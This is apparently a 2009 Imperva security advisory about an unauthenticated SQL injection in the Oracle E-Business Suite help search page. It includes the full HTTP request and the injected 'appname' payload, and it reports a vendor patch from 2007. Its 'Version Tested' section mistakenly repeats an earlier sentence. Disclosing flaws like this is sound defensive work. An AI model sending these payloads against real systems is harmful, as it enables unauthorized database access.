Security Advisory: Oracle EBS - SQL Injection vulnerability

January 20, 2009

Background

The Oracle E-Business Suite (EBS) is a collection of business Enterprise Resource Planning, Customer Relationship Management, and Supply Chain Management applications developed by Oracle Corporation. Interaction with the client is achieved through the Apache web server, Java technology (Applets) and several other Oracle technologies. Business data is stored in the Oracle database.

Scope

Imperva’s Application Defense Center is conducting a research of various business applications in order to devise better security solutions for them. The team generates reports of this sort when web application vulnerabilities are identified as part of the research.

Findings

We have discovered a SQL Injection vulnerability in an unauthenticated part of the application. SQL Injection attacks are used by hackers to attain unauthorized access to the DB. By sheer chance, however, the access granted by the SQL Injection vulnerability that we have found does not enable the attacker to efficiently steal sensitive data from the DB or otherwise make malicious use of it. This is because the injected SQL is very limited in size.

Details

The vulnerability was found at the help pages, and therefore does not require an authentication. The following POST request is used in the exploit:

                
                
  • POST http://first.imperva:8003/pls/PROD/fnd_help.search HTTP/1.1 Host: first.imperva:8003 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 Accept: text/xml,application/xml,application/xhtml+xml,text/html; q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://first.imperva:8003/OA_HTML/jsp/fnd/fndhelp.jsp?mode=search Cookie: JServSessionIdrootfirst=3gnajmhd71.nAzMqReIokPKnl9QmhDYcx4Qa3aK Content-Type: application/x-www-form-urlencoded Content-Length: 45
  • find_string=fghgfhfg&row_limit=25&langpath=US&appname=''or (contains(LOB.FILE_DATA,''x'',1)>0) and 1=2 --

A new argument ‘appname’ should be created and appended to the arguments in the message body. The content of the argument should take the following form:

                
                            '' or (contains(LOB.FILE_DATA,''x'',1)>0) and 1=2 --
                        
                    

This exploit can be easily carried out using a simple HTTP proxy. A similar GET request can be used instead of POST.

Version Tested

  • This exploit can be easily carried out using a simple HTTP proxy. A similar GET request can be used instead of POST.

Vendor Status

Patch available (CPU July 2007)

Discovered By

Guy Karlebach from Imperva
For comments and suggestions please contact adc@imperva.com

Disclaimer

The information within this advisory is subject to change without notice. Use of this information constitutes acceptance for use in an AS IS condition. Any use of this information is at the user’s own risk. There are no warranties, implied or expressed, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information.

Redistribution of this alert electronically is allowed as long as it is not edited in any way. To reprint this alert, in whole or in part, in any medium other than electronic medium, adc@imperva.com for permission.